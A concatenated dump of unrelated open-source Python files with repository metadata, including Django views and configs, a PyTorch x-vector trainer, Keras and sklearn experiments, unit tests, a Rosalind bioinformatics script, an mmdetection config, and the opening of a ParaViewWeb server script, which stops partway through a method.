| 2020-06-13T10:35:36.663668 | 2017-01-06T09:01:42 | 2017-01-06T09:01:42 | 75,392,559 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,335 |
py
|
"""Water URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from watres import urls as watres_url
from watstat import urls as watstat_url
from watres import views
from django.conf.urls.static import static
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$',views.index_view),
url(r'^watres/',include(watres_url)),
url(r'^watstat/',include(watstat_url)),
]
if settings.DEBUG:
if settings.MEDIA_ROOT:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
urlpatterns += staticfiles_urlpatterns()
|
[
"[email protected]"
] | |
64acd726fc80f2bd6451b0e36ae4cde1f625e944
|
8c2de4da068ba3ed3ce1adf0a113877385b7783c
|
/hyperion/torch/trainers/xvector_trainer.py
|
190b2a30b1c2f28d38d0c6999040ce4ae6a76f9f
|
[
"Apache-2.0"
] |
permissive
|
hyperion-ml/hyperion
|
a024c718c4552ba3a03aae2c2ca1b8674eaebc76
|
c4c9eee0acab1ba572843373245da12d00dfffaa
|
refs/heads/master
| 2023-08-28T22:28:37.624139 | 2022-03-25T16:28:08 | 2022-03-25T16:28:08 | 175,275,679 | 55 | 20 |
Apache-2.0
| 2023-09-13T15:35:46 | 2019-03-12T18:40:19 |
Python
|
UTF-8
|
Python
| false | false | 5,015 |
py
|
"""
Copyright 2019 Johns Hopkins University (Author: Jesus Villalba)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
import os
from collections import OrderedDict as ODict
import logging
import torch
import torch.nn as nn
from ..utils import MetricAcc
from .torch_trainer import TorchTrainer
class XVectorTrainer(TorchTrainer):
"""Trainer to train x-vector style models.
Attributes:
model: x-Vector model object.
optim: pytorch optimizer object or options dict
epochs: max. number of epochs
exp_path: experiment output path
cur_epoch: current epoch
grad_acc_steps: gradient accumulation steps to simulate larger batch size.
device: cpu/gpu device
metrics: extra metrics to compute besides cxe.
lrsched: learning rate scheduler object or options dict
loggers: LoggerList object, loggers write training progress to std. output and file.
If None, it uses default loggers.
ddp: if True use distributed data parallel training
ddp_type: type of distributed data parallel in (ddp, oss_ddp, oss_shared_ddp)
loss: if None, it uses cross-entropy
train_mode: training mode in ['train', 'ft-full', 'ft-last-layer']
use_amp: uses mixed precision training.
log_interval: number of optim. steps between log outputs
use_tensorboard: use tensorboard logger
use_wandb: use wandb logger
wandb: wandb dictionary of options
grad_clip: norm to clip gradients, if 0 there is no clipping
grad_clip_norm: norm type to clip gradients
swa_start: epoch to start doing swa
swa_lr: SWA learning rate
swa_anneal_epochs: SWA learning rate anneal epochs
cpu_offload: CPU offload of gradients when using fully sharded ddp
"""
def __init__(
self,
model,
optim={},
epochs=100,
exp_path="./train",
cur_epoch=0,
grad_acc_steps=1,
device=None,
metrics=None,
lrsched=None,
loggers=None,
ddp=False,
ddp_type="ddp",
loss=None,
train_mode="train",
use_amp=False,
log_interval=10,
use_tensorboard=False,
use_wandb=False,
wandb={},
grad_clip=0,
grad_clip_norm=2,
swa_start=0,
swa_lr=1e-3,
swa_anneal_epochs=10,
cpu_offload=False,
):
if loss is None:
loss = nn.CrossEntropyLoss()
super().__init__(
model,
loss,
optim,
epochs,
exp_path,
cur_epoch=cur_epoch,
grad_acc_steps=grad_acc_steps,
device=device,
metrics=metrics,
lrsched=lrsched,
loggers=loggers,
ddp=ddp,
ddp_type=ddp_type,
train_mode=train_mode,
use_amp=use_amp,
log_interval=log_interval,
use_tensorboard=use_tensorboard,
use_wandb=use_wandb,
wandb=wandb,
grad_clip=grad_clip,
grad_clip_norm=grad_clip_norm,
swa_start=swa_start,
swa_lr=swa_lr,
swa_anneal_epochs=swa_anneal_epochs,
cpu_offload=cpu_offload,
)
def train_epoch(self, data_loader):
"""Training epoch loop
Args:
data_loader: pytorch data loader returning features and class labels.
"""
self.model.update_loss_margin(self.cur_epoch)
metric_acc = MetricAcc(device=self.device)
batch_metrics = ODict()
self.set_train_mode()
for batch, (data, target) in enumerate(data_loader):
self.loggers.on_batch_begin(batch)
if batch % self.grad_acc_steps == 0:
self.optimizer.zero_grad()
data, target = data.to(self.device), target.to(self.device)
batch_size = data.shape[0]
with self.amp_autocast():
output = self.model(data, target, **self.amp_args)
loss = self.loss(output, target).mean() / self.grad_acc_steps
if self.use_amp:
self.grad_scaler.scale(loss).backward()
else:
loss.backward()
if (batch + 1) % self.grad_acc_steps == 0:
if self.lr_scheduler is not None and not self.in_swa:
self.lr_scheduler.on_opt_step()
self.update_model()
batch_metrics["loss"] = loss.item() * self.grad_acc_steps
for k, metric in self.metrics.items():
batch_metrics[k] = metric(output, target)
metric_acc.update(batch_metrics, batch_size)
logs = metric_acc.metrics
logs["lr"] = self._get_lr()
self.loggers.on_batch_end(logs=logs, batch_size=batch_size)
logs = metric_acc.metrics
logs = ODict(("train_" + k, v) for k, v in logs.items())
logs["lr"] = self._get_lr()
return logs
|
[
"[email protected]"
] | |
f352ec7987f6f9addb4cc8a333cc19463e602697
|
5332fef91e044555e605bb37cbef7c4afeaaadb0
|
/hy-data-analysis-with-python-2020/part02-e06_file_count/test/test_file_count.py
|
c7d3f00f44cd8f760c403784983ad6ec08d26a70
|
[] |
no_license
|
nopomi/hy-data-analysis-python-2019
|
f3baa96bbe9b6ee7f0b3e6f6b8b0f3adfc3b6cc8
|
464685cb377cfdeee890a008fbfbd9ed6e3bcfd0
|
refs/heads/master
| 2021-07-10T16:16:56.592448 | 2020-08-16T18:27:38 | 2020-08-16T18:27:38 | 185,044,621 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,560 |
py
|
#!/usr/bin/env python3
import sys
import unittest
from unittest.mock import patch
from itertools import repeat
from tmc import points
from tmc.utils import load, get_out
module_name="src.file_count"
file_count = load(module_name, "file_count")
main = load(module_name, "main")
class FileCount(unittest.TestCase):
@points('p02-06.1')
def test_first(self):
l, w, c = file_count("src/test.txt")
self.assertEqual(l, 8, msg="Wrong number of lines for file 'test.txt'!")
self.assertEqual(w, 105, msg="Wrong number of words for file 'test.txt'!")
self.assertEqual(c, 647, msg="Wrong number of characters for file 'test.txt'!")
@points('p02-06.1')
def test_calls(self):
with patch('builtins.open', side_effect=open) as o:
file_count("src/test.txt")
o.assert_called_once()
@points('p02-06.2')
def test_main(self):
orig_argv = sys.argv
n = 7
sys.argv[1:] = ["file%i" % i for i in range(n)]
with patch('src.file_count.file_count', side_effect=repeat((0,0,0))) as fc:
main()
self.assertEqual(fc.call_count, n,
msg="Wrong number of calls to function 'file_count' for %i command line parameters!" % n)
result = get_out().split('\n')
for i, line in enumerate(result):
self.assertEqual(line.strip(), "0\t0\t0\tfile%i" % i,
msg="Wrong result on line %i!" % i)
sys.argv = orig_argv
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
0340fad6844580f9a0ff3797769971efcc2f644a
|
52a4d869976a97498bdf56a8d0ff92cac138a136
|
/Bioinformatics Textbook Track/Chapter 1/rosalind_ba1d.py
|
4e6d4b0953bb2d76fa147c0368a4f8c3ded360aa
|
[] |
no_license
|
aakibinesar/Rosalind
|
d726369a787d848cc378976b886189978a60a3a5
|
375bbdbfb16bf11b2f980701bbd0ba74a1605cdb
|
refs/heads/master
| 2022-08-18T09:36:00.941080 | 2020-05-24T18:49:38 | 2020-05-24T18:49:38 | 264,722,651 | 0 | 0 | null | 2020-05-17T17:51:03 | 2020-05-17T17:40:59 | null |
UTF-8
|
Python
| false | false | 747 |
py
|
def occurrences(genome, sub):
"""
:param genome: genome for processing
:param sub: pattern for which we find indexes of occurnces
:return: list of indexes
"""
start = 0
indexes = []
while True:
start = genome.find(sub, start)
if start > 0:
indexes.append(start)
else:
break
start += 1
return indexes
def read_data_from(file_name):
with open(file_name, "r") as file:
pattern = file.readline().strip()
genome = file.readline().strip()
return genome, pattern
if __name__ == "__main__":
genome, pattern = read_data_from("rosalind_ba1d.txt")
indexes = occurrences(genome, pattern)
for ind in indexes:
print ind,
|
[
"[email protected]"
] | |
f1c755702c61d3a4c3f5e88391da6a3096250b2f
|
5399dd4580ea3f528753bc8b52a981743d62f8bb
|
/keras/keras36_hist3_wine.py
|
6844fef8e2c4a5ad39b62167985de24abdf45314
|
[] |
no_license
|
iwillbeaprogramer/Study
|
3ac7c118ffe3981d78b4ad263cb62432eae13970
|
3bfe571da5bbfc545b994e5878e217f9306bde14
|
refs/heads/main
| 2023-05-07T16:31:05.564973 | 2021-05-27T14:50:00 | 2021-05-27T14:50:00 | 324,044,441 | 8 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,733 |
py
|
from sklearn.datasets import load_wine
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import MinMaxScaler,OneHotEncoder
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.callbacks import EarlyStopping
import matplotlib.pyplot as plt
early_stopping = EarlyStopping(monitor='loss',patience=10)
datasets = load_wine()
x = datasets.data
y = datasets.target
encoder = OneHotEncoder()
y = encoder.fit_transform(y.reshape(-1,1)).toarray()
x_train,x_test,y_train,y_test = train_test_split(x,y,test_size=0.2)
x_train,x_val,y_train,y_val = train_test_split(x_train,y_train,test_size=0.2)
scaler = MinMaxScaler()
x_train = scaler.fit_transform(x_train)
x_test = scaler.fit_transform(x_test)
x_val = scaler.fit_transform(x_val)
model = Sequential()
model.add(Dense(128,activation='relu',input_dim=13))
model.add(Dense(64,activation='relu'))
model.add(Dense(32,activation='relu'))
model.add(Dense(16,activation='relu'))
model.add(Dense(8,activation='relu'))
model.add(Dense(3,activation='softmax'))
model.compile(loss = 'categorical_crossentropy',optimizer='adam',metrics=['accuracy'])
hist = model.fit(x_train,y_train,validation_data=(x_val,y_val),epochs=300,batch_size=4)
loss = model.evaluate(x_test,y_test,batch_size=4)
y_pred = model.predict(x_test)
print('loss : ',loss[0],'\naccuracy : ',loss[1])
'''
DNN
loss : 3.391478821868077e-05
accuracy : 1.0
'''
plt.plot(hist.history['loss'])
plt.plot(hist.history['val_loss'])
plt.plot(hist.history['accuracy'])
plt.plot(hist.history['val_accuracy'])
plt.title('loss & acc')
plt.ylabel('loss, acc')
plt.xlabel('epochs')
plt.legend(['train_loss','val_loss','train_acc','val_acc'])
plt.show()
|
[
"[email protected]"
] | |
01ed2276aaa8ccf051e68654900f77f99150ae15
|
4de03eecadc4c69caf792f4773571c2f6dbe9d68
|
/tests/seahub/share/views/test_send_shared_link.py
|
c265c943065929d26d603cb4f387bfa7dd71b7aa
|
[
"Apache-2.0"
] |
permissive
|
Tr-1234/seahub
|
c1663dfd12f7584f24c160bcf2a83afdbe63a9e2
|
ed255e0566de054b5570218cb39cc320e99ffa44
|
refs/heads/master
| 2022-12-23T16:20:13.138757 | 2020-10-01T04:13:42 | 2020-10-01T04:13:42 | 300,138,290 | 0 | 0 |
Apache-2.0
| 2020-10-01T04:11:41 | 2020-10-01T04:11:40 | null |
UTF-8
|
Python
| false | false | 3,204 |
py
|
from mock import patch
from django.core import mail
from django.core.urlresolvers import reverse
from django.test import override_settings
from seahub.profile.models import Profile
from seahub.profile.utils import refresh_cache
from seahub.test_utils import BaseTestCase
class SendSharedLinkTest(BaseTestCase):
def setUp(self):
mail.outbox = []
@override_settings(DEFAULT_FROM_EMAIL='[email protected]')
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
def test_can_send(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == '[email protected]'
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite(self):
self.login_as(self.user)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == self.user.email
assert mail.outbox[0].extra_headers['Reply-to'] == self.user.email
@patch('seahub.share.views.REPLACE_FROM_EMAIL', True)
@patch('seahub.share.views.ADD_REPLY_TO_HEADER', True)
@patch('seahub.share.views.IS_EMAIL_CONFIGURED', True)
@patch('seahub.utils.IS_EMAIL_CONFIGURED', True)
def test_can_send_from_replyto_rewrite_contact_email(self):
self.login_as(self.user)
nickname = 'Testuser'
contact_email= '[email protected]'
p = Profile.objects.add_or_update(self.user.email, nickname=nickname)
p.contact_email = contact_email
p.save()
refresh_cache(self.user.email)
resp = self.client.post(reverse('send_shared_link'), {
'email': self.user.email,
'file_shared_link': 'http://xxx',
'file_shared_name': 'xxx',
'file_shared_type': 'd',
'extra_msg': ''
}, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, resp.status_code)
self.assertEqual(len(mail.outbox), 1)
assert '<a href="http://xxx">http://xxx</a>' in mail.outbox[0].body
assert mail.outbox[0].from_email == contact_email
assert mail.outbox[0].extra_headers['Reply-to'] == contact_email
|
[
"[email protected]"
] | |
775b26f16fa53c27ec712bf92cfb31553c92f19d
|
e24511af0fdf299130fdf1e27b7eda1e35064e7c
|
/app/coupon/apps.py
|
bab96066b77b4592b0cf454c6ef51fa085d53a67
|
[] |
no_license
|
amitbhalla/lms
|
623dc6764dba5ee67a7f30d3882b7917b6441c2e
|
0810a875008b371a7bd3996742ad3b04ce037b14
|
refs/heads/main
| 2023-07-19T12:12:40.570958 | 2021-09-17T16:55:29 | 2021-09-17T16:55:29 | 405,055,595 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 144 |
py
|
from django.apps import AppConfig
class CouponConfig(AppConfig):
default_auto_field = "django.db.models.BigAutoField"
name = "coupon"
|
[
"[email protected]"
] | |
84340a119e8fdb72320174077f9aa1c0605ca64f
|
9d566e153a254390ed758f4e945781899b6dcd07
|
/03_django/02_django_crud/articles/views.py
|
e9c78e872870c579df912051bc9513f1f01afb88
|
[] |
no_license
|
baambox5/TIL
|
6f1b0fdc342ed29b85a68404b916fc6f4cace7bf
|
0419779ccbf506a1e89d581b98658dd07b78388c
|
refs/heads/master
| 2023-01-13T01:14:08.125234 | 2020-01-17T14:36:34 | 2020-01-17T14:36:34 | 195,918,108 | 0 | 0 | null | 2023-01-07T11:27:08 | 2019-07-09T02:31:02 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 2,964 |
py
|
from IPython import embed
from django.core.exceptions import ValidationError
from django.shortcuts import render, redirect
from .models import Article, Comment
# Create your views here.
def index(request):
# articles = Article.objects.all()
articles = Article.objects.order_by('-pk') # DB가 변경(가능한 권장)
# articles = Article.objects.all()[::-1] # python이 변경
context = {'articles': articles,}
return render(request, 'articles/index.html', context)
def create(request):
# CREATE
if request.method == 'POST':
title = request.POST.get('title')
content = request.POST.get('content')
image = request.FILES.get('image')
# 1
# article = Article()
# article.title = title
# article.content = content
# article.save()
# 2
article = Article(title=title, content=content, image=image)
article.save()
# 3
# Article.objects.create(title=title, content=content)
return redirect(article) # 메인 페이지
# return redirect('/articles/', article.pk)
# NEW
else:
return render(request, 'articles/create.html')
def detail(request, article_pk):
article = Article.objects.get(pk=article_pk)
comments = article.comment_set.all()
context = {'article': article, 'comments': comments,}
return render(request, 'articles/detail.html', context)
def delete(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.delete()
return redirect('articles:index')
else:
return redirect(article)
def update(request, article_pk):
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
article.title = request.POST.get('title')
article.content = request.POST.get('content')
article.image = request.FILES.get('image')
article.save()
return redirect(article)
else:
context = {'article': article,}
return render(request, 'articles/update.html', context)
def comments_create(request, article_pk):
# 댓글을 달 게시글
article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
# form에서 넘어온 댓글 정보
content = request.POST.get('content')
# 댓글 생성 및 저장
comment = Comment(article=article, content=content)
comment.save()
return redirect(article)
# return redirect('articles:detail', article.pk)
# return redirect('articles:detail' article_pk)
else:
return redirect(article)
def comments_delete(request, article_pk, comment_pk):
# article = Article.objects.get(pk=article_pk)
if request.method == 'POST':
comment = Comment.objects.get(pk=comment_pk)
comment.delete()
# return redirect(article)
return redirect('articles:detail', article_pk)
|
[
"[email protected]"
] | |
a3cf7cefbf7e8537e0c1fe7a704c4158e33f881b
|
39e03684081b27311385a0ab31afcc2e09883e5c
|
/configs/reppoints/bbox_r50_grid_center_fpn_1x.py
|
f971b5b7b8c78a6abca727e7015b96d085b5f33b
|
[
"MIT",
"Python-2.0"
] |
permissive
|
witnessai/MMSceneGraph
|
8d0b2011a946ddcced95fbe15445b7f4da818509
|
bc5e0f3385205404c712ae9f702a61a3191da0a1
|
refs/heads/master
| 2023-08-12T06:54:00.551237 | 2021-10-12T03:04:21 | 2021-10-12T03:04:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,462 |
py
|
# model settings
norm_cfg = dict(type='GN', num_groups=32, requires_grad=True)
model = dict(
type='RepPointsDetector',
pretrained='torchvision://resnet50',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
start_level=1,
add_extra_convs=True,
num_outs=5,
norm_cfg=norm_cfg),
bbox_head=dict(
type='RepPointsHead',
num_classes=81,
in_channels=256,
feat_channels=256,
point_feat_channels=256,
stacked_convs=3,
num_points=9,
gradient_mul=0.1,
point_strides=[8, 16, 32, 64, 128],
point_base_scale=4,
norm_cfg=norm_cfg,
loss_cls=dict(
type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox_init=dict(type='SmoothL1Loss', beta=0.11, loss_weight=0.5),
loss_bbox_refine=dict(type='SmoothL1Loss', beta=0.11, loss_weight=1.0),
transform_method='minmax',
use_grid_points=True))
# training and testing settings
train_cfg = dict(
init=dict(
assigner=dict(type='PointAssigner', scale=4, pos_num=1),
allowed_border=-1,
pos_weight=-1,
debug=False),
refine=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.4,
min_pos_iou=0,
ignore_iof_thr=-1),
allowed_border=-1,
pos_weight=-1,
debug=False))
test_cfg = dict(
nms_pre=1000,
min_bbox_size=0,
score_thr=0.05,
nms=dict(type='nms', iou_thr=0.5),
max_per_img=100)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.01, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/bbox_r50_grid_center_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
|
[
"[email protected]"
] | |
0187aa1b8fa9854b1f253d952bda031992f4b423
|
20a3cc1106fa86fc2d45cd1728cc87d5db97e1f7
|
/old/pddbm/bug3.py
|
7d0a81d444b74c37e2e621dc7a08f50608b54c18
|
[] |
no_license
|
sarahboufelja54/galatea
|
f5664f0b3117629b2c5bbe078a1bd52bb5e359e6
|
002a9f2905868be25b71770190fb2d5eda11c861
|
refs/heads/master
| 2020-12-04T13:45:07.697189 | 2018-12-12T16:27:09 | 2018-12-12T16:27:19 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,268 |
py
|
import numpy as np
from sklearn.svm import SVC
import time
rng = np.random.RandomState([1,2,3])
m = 1000
n = 1000
X = rng.randn(m,n)
w = rng.randn(n)
b = rng.randn(1)
y = (np.dot(X,w) + b ) > 0
t1 = time.time()
svm = SVC(kernel = 'linear', C = 1.0).fit(X,y)
t2 = time.time()
print 'train time ',t2 - t1
t1 = time.time()
y1 = svm.predict(X)
t2 = time.time()
print 'predict time ',t2 - t1
print '# support vectors:',svm.n_support_
print 'predict time per support vector:',(t2-t1)/float(svm.n_support_.sum())
coef = svm.coef_[0,:]
orig_coef = svm.coef_
t1 = time.time()
f = - np.dot(X, orig_coef.T) + svm.intercept_
y2 = f < 0
print y.shape
print y2.shape
print (y2 == y).shape
quit(-1)
t2 = time.time()
print 'dot product time',t2 -t1
print 'class 1 prevalence ',y.mean()
print 'predict accuracy ',(y1 == y).mean()
print 'dot product accuracy ',(y2 == y).mean()
print 'predict and dot agreement rate',(y1 == y2).mean()
coefs = svm.dual_coef_
assert len(coefs.shape) == 2
assert coefs.shape[0] == 1
coefs = coefs[0,:]
w = np.dot(svm.support_vectors_.T, coefs)
assert np.allclose(w,-coef)
f = np.dot(X,w) + b
y3 = (f < 0)
print 'agreement rate with my method: ',(y3 == y1).mean()
print 'dot prod between sklearn coef_ and my coef_: ',np.dot(w,svm.coef_[0,:])
|
[
"[email protected]"
] | |
244651275300889c2f7a9b4928af9c1940ad6614
|
4be9a5bdb8e051001b78c8f127ccc1a7f85c14e7
|
/bugzilla/migrations/0002_auto_20170205_1515.py
|
6b518a7b30a1bea8b1cda0d937046f6fe0febbe5
|
[] |
no_license
|
quentin-david/heimdall
|
f72a85606e7ab53683df2023ef5eaba762198211
|
84a429ee52e1891bc2ee4eb07a084dff209c789c
|
refs/heads/master
| 2021-01-21T10:26:28.895663 | 2017-07-21T19:19:46 | 2017-07-21T19:19:46 | 83,432,596 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 638 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 15:15
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bugzilla', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bugzilla',
options={'ordering': ['-date_update']},
),
migrations.AlterField(
model_name='bugzilla',
name='state',
field=models.CharField(choices=[('open', 'Open'), ('close', 'Close'), ('info', 'Info')], max_length=15),
),
]
|
[
"[email protected]"
] | |
7b0c4083d029a92441704bd296c1aef0ebbf84f2
|
2d4ab8e3ea9fd613ec0ae0c1956b68874c9b5f06
|
/tests/pipelines/cnv_calling/test_xhmm_pca.py
|
e9dc13feb4ca41c6220481e9e7105e1e72bce443
|
[] |
no_license
|
biocodices/paip
|
4abd39cbbd372a68592da87177c70c403d5a661d
|
040a62c11e5bae306e2de4cc3e0a78772ee580b3
|
refs/heads/master
| 2021-01-17T20:48:28.642255 | 2019-07-26T14:30:58 | 2019-07-26T14:30:58 | 62,604,413 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,013 |
py
|
from unittest.mock import MagicMock
import pytest
from paip.pipelines.cnv_calling.xhmm_pca import XhmmPCA, EmptyInputMatrix
@pytest.fixture
def task(cohort_task_factory):
return cohort_task_factory(XhmmPCA)
def test_check_matrix(task):
# NOTE: Run this test before the next one, because the tested method
# check_matrix() will be mocked in test_run().
empty_matrix = pytest.helpers.file('empty_matrix.txt')
with pytest.raises(EmptyInputMatrix):
task.check_matrix(empty_matrix)
def test_run(task, mock_rename):
check_matrix = MagicMock()
task.check_matrix = check_matrix
task.run()
check_matrix.assert_called_once()
(command, ), kwargs = task.run_command.call_args
assert 'xhmm --PCA' in command
assert 'DATA.filtered_centered.RD.txt' in command
assert 'DATA-temp.RD_PCA' in command
assert mock_rename.call_count == 3
assert 'DATA-temp.RD_PCA' in mock_rename.call_args[0][0]
assert 'DATA.RD_PCA' in mock_rename.call_args[0][1]
|
[
"[email protected]"
] | |
7df75a268c13f4de545db13ec51df02cd9cdbda5
|
ddcc89dc88961f37d50c0f9d893f265bf34afdb3
|
/test/test_simple_module_pass.py
|
f6be33ae365cbfb62819b6d08a8740fcd1ff5120
|
[
"Unlicense",
"LicenseRef-scancode-unknown-license-reference",
"NCSA",
"LicenseRef-scancode-public-domain"
] |
permissive
|
mulle-nat/property-syntax-modernizer
|
f351319314a0216e5e241fa03f9d95a3764a6590
|
93445534221840d0df6cfb2d2f4ceb73f37ac962
|
refs/heads/master
| 2020-08-07T08:57:02.149734 | 2019-10-07T12:46:11 | 2019-10-07T12:46:11 | 213,381,270 | 0 | 0 |
Unlicense
| 2019-10-07T13:11:51 | 2019-10-07T12:47:05 |
C++
|
UTF-8
|
Python
| false | false | 442 |
py
|
import sys, unittest
from tools import SamplesTestCase
OUTPUT_FOR_GLOBALS = '''\
Found global named "gfloat": type = float*
Found global named "gppfloat": type = float***
Found global named "gint": type = i32*
'''
PROG = 'simple_module_pass'
class TestSimpleModulePass(SamplesTestCase):
def test_on_globals(self):
self.assertSampleOutput([PROG], 'globals.ll', OUTPUT_FOR_GLOBALS)
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
015c735e062ac63dde157d1b06e700b8009e14ce
|
8a1241ac8ad91672aec81c878f2165a7678a1ad6
|
/Web/Applications/Visualizer/server/pv_web_visualizer.py
|
84ef98ae22d8c269ffca4d47cdd4e0a31d3dd2f0
|
[
"MIT",
"LicenseRef-scancode-paraview-1.2",
"Apache-2.0",
"LicenseRef-scancode-protobuf",
"BSD-3-Clause"
] |
permissive
|
lmynsberge/ParaView
|
d9fbd0f4da197bc96172be8697ced76fe73852bf
|
2a68ee496949becf499742dfdbecb41b1eda81a7
|
refs/heads/master
| 2021-01-22T16:18:25.241194 | 2013-11-11T15:01:02 | 2013-11-11T15:01:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,203 |
py
|
r"""
This module is a ParaViewWeb server application.
The following command line illustrate how to use it::
$ pvpython .../pv_web_visualizer.py --data-dir /.../path-to-your-data-directory
--data-dir is used to list that directory on the server and let the client choose a file to load.
--load-file try to load the file relative to data-dir if any.
--ds-host None
Host name where pvserver has been started
--ds-port 11111
Port number to use to connect to pvserver
--rs-host None
Host name where renderserver has been started
--rs-port 22222
Port number to use to connect to the renderserver
Any ParaViewWeb executable script come with a set of standard arguments that
can be overriden if need be::
--port 8080
Port number on which the HTTP server will listen to.
--content /path-to-web-content/
Directory that you want to server as static web content.
By default, this variable is empty which mean that we rely on another server
to deliver the static content and the current process only focus on the
WebSocket connectivity of clients.
--authKey vtkweb-secret
Secret key that should be provided by the client to allow it to make any
WebSocket communication. The client will assume if none is given that the
server expect "vtkweb-secret" as secret key.
"""
# import to process args
import os
# import paraview modules.
from paraview.web import wamp as pv_wamp
from paraview.web import protocols as pv_protocols
from vtk.web import server
try:
import argparse
except ImportError:
# since Python 2.6 and earlier don't have argparse, we simply provide
# the source for the same as _argparse and we use it instead.
import _argparse as argparse
# =============================================================================
# Create custom Pipeline Manager class to handle clients requests
# =============================================================================
class _PipelineManager(pv_wamp.PVServerProtocol):
dataDir = None
authKey = "vtkweb-secret"
dsHost = None
dsPort = 11111
rsHost = None
rsPort = 11111
fileToLoad = None
def initialize(self):
# Bring used components
